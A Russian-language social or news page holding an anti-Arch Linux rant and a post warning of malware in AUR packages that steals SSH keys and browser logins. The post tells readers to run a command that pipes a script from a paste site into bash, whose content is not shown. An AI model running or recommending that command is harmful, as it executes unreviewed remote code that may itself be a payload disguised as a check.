Закрыть
(делаю вид как будто я эту новость вижу впервые)

Ура! Молодцы кто льют в помойку помои, я скажу честно, этот рассадник снобизма уже давно надо уничтожить, это тот самый дистрибутив Linux который показывает - что та архитектура системы которая она имеет ее просто невозможно доработать для самого обычного человека, она слишком модульна, например банально инициализацией, API библиотеки, это все держится на сторонних утилитах и из-за этого обновляя частями систему вероятность что-то сломать увеличивается быстрее арифметической прогрессии, особенно на заранее нестабильные компоненты (Rolling Release, альцгеймер все же лечим).

Это как с домом, самые обычные дома для нормальных людей - снизу закопанный землей фундамент, сверху уже самый обычный, комфортный, уютный, пусть как у всех, но обычный дом где можно обустраивать быт и.. я не придумал. (Windows, MacOS)

Но в Linux этот фундамент мало того что он на клее и честном слове, так еще и не закопан под землей, просто недоделан, так этим еще и хвастаются даже больше чем самим домом сверху.

Поэтому я считаю что лучше всего и по итогу просто переустроить весь концепт десктопного Linux так такого, и это и сделает его более привлекательным, чем рассказы о том, "какой Arch крутой", я по этому поводу все сказал.
Показать больше
❗️Малварь в AUR

Народ, в AUR последние пару дней раздают заразу. Сотни пакетов — не один, не два, а реально много, в том числе те, что ставят обычные люди. Воровать умеет SSH-ключи, логины из браузеров, возможно, цепляет руткит.

Если что-то ставили или обновляли из AUR за последние дни — проверьтесь:

"curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash"

Заражённый пакет сносится через sudo pacman -Rdd имя_пакета.

Пока полной картины нет, но вывод простой: AUR сейчас не трогаем, пока не разберутся. Честно говоря, это хорошее напоминание, что AUR всегда был зоной «сам себе режиссёр».

Ссылки для тех, кто хочет копнуть глубже:
• Обсуждение на списке рассылки: https://lists.archlinux.org/archives/list/[email protected]/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
• Предварительный разбор: https://ioctl.fail/preliminary-analysis-of-aur-malware/
• Скрипт проверки: https://gist.github.com/Kidev/59bf9f5fb53ab5eee99f19a6a2fc3992

Берегите свои машины.

https://t.me/os_world_channel
Показать больше
Автор: Артём Добрый
Пожаловаться  |  Поделиться

Комментарии (2)

Действия